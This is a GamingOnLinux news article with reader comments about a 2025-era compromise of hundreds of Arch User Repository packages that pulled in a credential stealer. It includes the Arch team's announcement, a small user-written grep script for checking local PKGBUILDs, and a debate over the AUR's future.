Support us on Patreon
PayPalUpdate - 18:55 UTC - The Arch Linux team put up an official announcement now:
We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.
We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed. While this is happening, and while we work to create a more permanent solution, users may see issues with the following:
- Creating new accounts on the AUR
- Pushing package updates
- Adopting or creating new packages
We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.
Original article below:
Looks like the Arch Linux AUR (Arch User Repository) needs some better security and package checks - as some malicious users compromised a lot of packages.
For those who aren't clear on the details - the AUR is a community-driven way of providing extra software for Arch Linux. Anyone can submit a package to it. This is completely separate to the actual Arch Linux packages which were not hit.
There's a thread on the public AUR Mailing List with people reporting packages, where it seems like over 400 packages were hit with the issue. Arch packager Jonathan Grotelüschen mentioned work was ongoing to "reset/delete all malicious commits and ban the accounts".
From the packages that were changed, they were made to include npm (a package manager), which is then used to pull in some sort of keylogger / credentials stealer - so it's really quite a shocking security breach to have affected so many different packages.
Hopefully the mess will get sorted fully soon, and for some improvements to the packaging processes to prevent this from happening in future. Especially with the rise of AI bots, and how much easier this sort of thing has become thanks to them - it could end up a lot worse in future.
Oh dear.
Article taken from GamingOnLinux.com.
See more from me
You can also find comments for this article on social media: 
Quoting: Turkeysteaksfor anyone who doesn't use an AUR helper, I made this basic little bash script:Or just:
for dir in ~/AUR/*/
do
dir=${dir%*/}
echo "${dir}"
cd ${dir}
cat PKGBUILD | grep $1
cd ~/AUR/
done
if you don't keep your AUR packages in ~/AUR/, you will need to change that in the code.
run it with `./<script-name>.sh <bad-package>`. so for this one, if you do `./script.sh atomic` and any of them print anything, you have been compromised. If none of them do, you're hopefully safe.
grep atomic ~/AUR/*/PKGBUILDfor yay users:
grep atomic ~/.cache/yay/*/PKGBUILD :-)
Philadelphus 1 hour ago
Quoting: Liam Squires-HandIf they cannot do any checks - that's just a glaring flaw in the entire design of the AUR and so yes - it should be shut. If it's just going to repeatedly be a huge security issue like this, then why should it exist? It's dangerous.
I don't think that would be helpful in the long run. "Why should [the AUR] exist?" is a pertinent question. Presumably it exists because it fills a need. People encounter problems not solved by official packages, code up a solution, and want to share it without going through the hassle of making it an official package (for whatever reason, I can think of several legitimate ones). Other people encounter the same problems and find those proffered solutions. If it wasn't helpful in some capacity, the AUR wouldn't exist. We could shut it down, but doing so will not magically make those problems people have go away; someone would just set up another similar site to fill the vacuum (one not under the purview of the Arch team, this time).
It's like closing one beach for shark sightings. People will just go to another beach in a different jurisdiction, they're not going to stop swimming. If the Arch teams keeps the AUR around, they can try to improve its security (which I approve of, for the record); if they close it, they don't have much recourse if it turns out the "new AUR" that pops up turns out to be run by malicious actors after lots of people have swapped to it.